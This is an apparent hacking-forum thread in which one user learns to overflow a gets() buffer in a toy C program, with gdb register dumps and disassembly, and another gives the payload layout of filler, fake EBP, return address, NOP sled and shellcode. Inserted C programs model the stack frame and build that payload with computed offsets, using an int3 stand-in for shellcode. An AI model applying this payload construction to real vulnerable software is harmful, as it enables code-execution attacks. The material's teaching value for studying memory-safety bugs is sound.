Can you check my stack please

Forum: Hacking
h3llfyr3:

Trying to work out what's going on with my buffer overflow. My code:

```c
#include <stdio.h>

void return_input(void)
{
    char array[30];
    gets(array);            /* unbounded read: this is the overflow under discussion */
    printf("%s\n", array);
}

int main(void)
{
    return_input();
    return 0;
}
```

OK, my buffer is 30 bytes long, but because of the way memory is allocated it is actually 32 bytes long. So I write in 40 bytes of data and that will overwrite both ebp and eip, as they are 4 bytes each. So when I do

```
h3llfyr3@slax:~$ perl -e 'print "A"x40 ' | ./overflow
```

I get

```
(gdb) info registers
eax            0x0         0
ecx            0x40142840  1075062848
edx            0x29        41
ebx            0x40141ff4  1075060724
esp            0xbffff508  0xbffff508
ebp            0x41414141  0x41414141
esi            0xbffff58c  -1073744500
edi            0x1         1
eip            0x41414141  0x41414141
eflags         0x210286    2163334
cs             0x73        115
ss             0x7b        123
ds             0x7b        123
es             0x7b        123
fs             0x0         0
gs             0x0         0
```

which is correct, as my ebp and eip have now been overwritten with A's. I'm not sure where the space reserved for my array is. I know that 32 in hex is 0x20 but can't find a reference to it anywhere, and this is confusing me. Below is my disassembly of main and return_input from gdb. Letting me know what is right / wrong would be a great help. Thanks for bearing with me.

```
(gdb) disas main
Dump of assembler code for function main:
0x080483ef <main+0>:    push   %ebp
0x080483f0 <main+1>:    mov    %esp,%ebp
0x080483f2 <main+3>:    sub    $0x8,%esp
0x080483f5 <main+6>:    and    $0xfffffff0,%esp
0x080483f8 <main+9>:    mov    $0x0,%eax
0x080483fd <main+14>:   sub    %eax,%esp
0x080483ff <main+16>:   call   0x80483c4 <return_input>
0x08048404 <main+21>:   mov    $0x0,%eax
0x08048409 <main+26>:   leave
0x0804840a <main+27>:   ret
```

My notes on main, instruction by instruction:

- `push %ebp`: I think what this is doing is first storing the base pointer on the stack.
- `mov %esp,%ebp`: now it's moving the stack pointer into the base pointer.
- `sub $0x8,%esp`: I think this is reserving space for my variable by subtracting 8 from the stack pointer.
- `and $0xfffffff0,%esp`: or this might be the space reserved for my variable?
- `mov $0x0,%eax`: adding something to the accumulation register.
- `sub %eax,%esp`: not sure.
- `call 0x80483c4 <return_input>`: this is the ret address that EIP will go back to after the data from array has been collected; my shellcode should start in the address referenced here.
- `mov $0x0,%eax`: not sure here either.
- `leave`: might be finishing the function.
- `ret`: this is my ret address, so the instructions at 0x0804840a are where my shellcode must start, or I need to overwrite the ret address with a new one.....

I also can't see anything in here; again, I'm looking for that 0x20 that is my 30 chars.

```
(gdb) disas return_input
Dump of assembler code for function return_input:
0x080483c4 <return_input+0>:    push   %ebp
0x080483c5 <return_input+1>:    mov    %esp,%ebp
0x080483c7 <return_input+3>:    sub    $0x28,%esp
0x080483ca <return_input+6>:    sub    $0xc,%esp
0x080483cd <return_input+9>:    lea    0xffffffd8(%ebp),%eax
0x080483d0 <return_input+12>:   push   %eax
0x080483d1 <return_input+13>:   call   0x80482c4 <_init+40>
0x080483d6 <return_input+18>:   add    $0x10,%esp
0x080483d9 <return_input+21>:   sub    $0x8,%esp
0x080483dc <return_input+24>:   lea    0xffffffd8(%ebp),%eax
0x080483df <return_input+27>:   push   %eax
0x080483e0 <return_input+28>:   push   $0x8048524
0x080483e5 <return_input+33>:   call   0x80482e4 <_init+72>
0x080483ea <return_input+38>:   add    $0x10,%esp
0x080483ed <return_input+41>:   leave
0x080483ee <return_input+42>:   ret
```
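The frame h3llfyr3 is looking for, as an added example that is not code from the thread: in the posted listing `sub $0x28,%esp` reserves 40 bytes and `lea 0xffffffd8(%ebp),%eax` (0xffffffd8 is -40) puts the array at ebp-40, so the slot is 40 bytes, not the 32 (0x20) being searched for, with the saved EBP at byte 40 and the return address at byte 44. The program below models that frame as a struct (an assumption drawn from the disassembly, standing in for the real stack so it cannot crash), fills it the way `gets()` and a bounded `fgets()` would, and reports which input lengths reach the two control words: 40 bytes of 'A' only drop the terminating NUL on the low byte of the saved EBP, 44 own the saved EBP, 48 own the return address. The placeholder caller EBP is constructed; the original return address is main+21 from the listing.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Frame of return_input() as the posted disassembly lays it out:
 *   sub $0x28,%esp            -> 40 bytes reserved (30 rounded up to 40, not 32)
 *   lea 0xffffffd8(%ebp),%eax -> the array starts at ebp-40
 * Above the 40-byte slot sit the saved EBP (ebp+0) and return address (ebp+4).
 * This struct is an assumption drawn from that listing; it stands in for the
 * real stack so the demo cannot crash.  Byte order is x86 little-endian. */
struct frame {
    char array[30];     /* ebp-40 .. ebp-11: the declared buffer */
    char pad[10];       /* ebp-10 .. ebp-1 : bytes the compiler left before EBP */
    uint32_t saved_ebp; /* ebp+0 */
    uint32_t ret;       /* ebp+4 */
};

#define ORIG_EBP 0xbffff520u  /* constructed placeholder for the caller's EBP */
#define ORIG_RET 0x08048404u  /* main+21: the instruction after the call */

/* Constructed input: n bytes of 'A', as perl -e 'print "A"x40' delivers. */
static const char *a_run(size_t n)
{
    static char buf[128];
    if (n > sizeof buf - 1)
        n = sizeof buf - 1;
    memset(buf, 'A', n);
    buf[n] = '\0';
    return buf;
}

/* gets()-style fill: copy until newline or end of input, then a NUL, with no
 * regard for the 30-byte array.  The stop at sizeof *f only keeps the model
 * inside the struct; the real gets() has no stop at all. */
static void fill_with_gets(struct frame *f, const char *input)
{
    unsigned char *dst = (unsigned char *)f;
    size_t i = 0;
    while (i < sizeof *f && input[i] != '\0' && input[i] != '\n') {
        dst[i] = (unsigned char)input[i];
        i++;
    }
    if (i < sizeof *f)
        dst[i] = '\0';
}

/* fgets(array, sizeof array, stdin)-style fill: at most 29 bytes plus a NUL,
 * so the bytes above the array are never written. */
static void fill_with_fgets(struct frame *f, const char *input)
{
    size_t n = strcspn(input, "\n");
    if (n > sizeof f->array - 1)
        n = sizeof f->array - 1;
    memcpy(f->array, input, n);
    f->array[n] = '\0';
}

static struct frame run(const char *input, int use_gets)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    f.saved_ebp = ORIG_EBP;
    f.ret = ORIG_RET;
    if (use_gets)
        fill_with_gets(&f, input);
    else
        fill_with_fgets(&f, input);
    return f;
}

/* What the saved EBP / return address hold after the input has been read. */
static uint32_t ebp_after(const char *input, int use_gets) { return run(input, use_gets).saved_ebp; }
static uint32_t ret_after(const char *input, int use_gets) { return run(input, use_gets).ret; }

int main(void)
{
    static const size_t lens[] = { 30, 39, 40, 43, 44, 47, 48 };
    for (size_t k = 0; k < sizeof lens / sizeof lens[0]; k++) {
        size_t n = lens[k];
        printf("%2zu x 'A'  gets: ebp=0x%08x ret=0x%08x   fgets: ebp=0x%08x ret=0x%08x\n",
               n,
               (unsigned)ebp_after(a_run(n), 1), (unsigned)ret_after(a_run(n), 1),
               (unsigned)ebp_after(a_run(n), 0), (unsigned)ret_after(a_run(n), 0));
    }
    return 0;
}
```

The table the program prints is the answer to the "where is my 0x20" question: the array's bytes run out at offset 30, the compiler's padding at 40, and only an input of 48 bytes or more leaves 0x41414141 in both control words the way the register dump shows.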
c0d3r:

Your memory is working 4 bytes by 4 bytes; when you apply 30 bytes it has to register 4*8 bytes for you in memory. Your shellcode lies around esp and some bytes after ebp. As I experienced, the address is like 0xbffffa41 and not so stable. Ask the questions you might have, I will try to help you out. So 0x08**** is not where you should jump.
h3llfyr3:

Cheers c0d3r, very helpful, I think I'm getting there.

```
0x080483ff <main+16>:   call   0x80483c4 <return_input>
```

OK, so this is the start of my input to the buffer, i.e. the initial A's, the 32 bytes (+8 for ret and sfp), ret and sfp being at the 'end', so my stack looks like this:

```
AAAA (RET) AAAA (EBP) AAAAAAAAAAAAAAA (array)
```

gets seems key here, as we persuade it to read the wrong memory address. You said gets takes the top four bytes off the stack; is this what it thinks is the right RET address and loads it into EIP? So my shellcode must go into the address where RET is pointing? Or does my shellcode start here, where return_input is?

```
0x080483ff <main+16>:   call   0x80483c4 <return_input>
```

Which part is 'gets'?

```
0x080483ff <main+16>:   call   0x80483c4 <return_input>
```
c0d3r:

See, function addresses are different from where we might want to jump. Shellcode is being loaded into the stack, and in these kinds of examples it is around 0xbffff***; sometimes we have junk (will discuss it later). All you do is feed it with 32*"\x41" + "\x42\x42\x42\x42" + "\x43\x43\x43\x43" + 100 NOP + shellcode; you will have a core file with an illegal instruction at 0x43434343. Send your core to me, I will tell you where to jump and why :)
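c0d3r's recipe above (filler, then "\x42\x42\x42\x42" for the saved EBP, "\x43\x43\x43\x43" for the return address, a NOP sled, then the shellcode) and h3llfyr3's question about where the shellcode goes, as an added example that is not code from either poster: it derives the filler length from the `lea 0xffffffd8(%ebp)` in the posted disassembly (40 bytes, so the fake EBP sits at offset 40 and the return address at 44, eight bytes later than a 32-byte guess would put them), lays the two words out little-endian as x86 stores them, and checks the one thing `gets()` silently breaks on: a newline byte inside the payload, which ends the read before the return address is reached. The 0x42424242 fake EBP, the 0xbffffa00 sled base in the test and the int3 stand-in for shellcode are constructed; the only real value used is the displacement from the listing.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Read an AT&T immediate or displacement ("0x28", "0xffffffd8") as the
 * signed 32-bit value the CPU uses, so 0xffffffd8 comes back as -40. */
static int32_t parse_disp32(const char *s)
{
    return (int32_t)(uint32_t)strtoul(s, NULL, 0);
}

/* Bytes from the start of the buffer to the saved EBP, taken from the lea
 * that forms the buffer's address: lea 0xffffffd8(%ebp) -> 40, not 32. */
static size_t filler_from_lea(const char *lea_disp)
{
    int32_t d = parse_disp32(lea_disp);
    return d < 0 ? (size_t)(-d) : 0;
}

struct payload {
    unsigned char bytes[256];
    size_t len;
    size_t ebp_off;  /* offset of the 4 fake-EBP bytes */
    size_t ret_off;  /* offset of the 4 return-address bytes */
    size_t nop_off;  /* offset where the NOP sled starts */
};

static void put_le32(unsigned char *p, uint32_t v)
{
    for (int i = 0; i < 4; i++)
        p[i] = (unsigned char)(v >> (8 * i));
}

/* c0d3r's layout: filler up to the saved EBP, 4 bytes of fake EBP, 4 bytes of
 * return address (little-endian, as x86 stores it), a NOP sled, then the code.
 * Returns -1 if it would not fit in the buffer. */
static int build_payload(struct payload *p, size_t filler, uint32_t fake_ebp,
                         uint32_t ret_addr, size_t nops,
                         const unsigned char *code, size_t code_len)
{
    size_t total = filler + 8 + nops + code_len;
    if (total > sizeof p->bytes)
        return -1;
    memset(p->bytes, 'A', filler);
    p->ebp_off = filler;
    put_le32(p->bytes + p->ebp_off, fake_ebp);
    p->ret_off = filler + 4;
    put_le32(p->bytes + p->ret_off, ret_addr);
    p->nop_off = filler + 8;
    memset(p->bytes + p->nop_off, 0x90, nops);
    memcpy(p->bytes + p->nop_off + nops, code, code_len);
    p->len = total;
    return 0;
}

/* gets() stops at the first newline, so a 0x0a anywhere (usually hiding
 * inside an address) truncates the payload before the return address. */
static int payload_is_gets_safe(const struct payload *p)
{
    return memchr(p->bytes, '\n', p->len) == NULL;
}

/* The stack address c0d3r calls "not so stable": with a sled, any guess
 * inside [sled_base, sled_base + nops) slides down into the code. */
static int ret_lands_in_sled(uint32_t sled_base, size_t nops, uint32_t ret_addr)
{
    return ret_addr >= sled_base && ret_addr < sled_base + nops;
}

/* The layout for the posted frame (filler from the lea) around a constructed
 * two-byte int3 stand-in for shellcode, so hitting the sled traps instead of
 * running anything.  Returns NULL if the payload does not fit. */
static const struct payload *demo_payload(uint32_t ret_addr, size_t nops)
{
    static struct payload p;
    static const unsigned char stand_in[] = { 0xcc, 0xcc };
    if (build_payload(&p, filler_from_lea("0xffffffd8"), 0x42424242u, ret_addr,
                      nops, stand_in, sizeof stand_in) != 0)
        return NULL;
    return &p;
}

int main(void)
{
    /* Stage one of the recipe: CCCC as the return address, so the crash at
     * 0x43434343 confirms which four bytes of input became EIP. */
    const struct payload *p = demo_payload(0x43434343u, 100);
    if (p == NULL || !payload_is_gets_safe(p))
        return 1;
    fwrite(p->bytes, 1, p->len, stdout);   /* ./build_payload | ./overflow */
    return 0;
}
```

Run it with the output piped into the vulnerable binary under gdb; a fault at 0x43434343 confirms the 44-byte distance to the return address, after which the CCCC word is replaced with an address inside the sled taken from the core, as c0d3r describes.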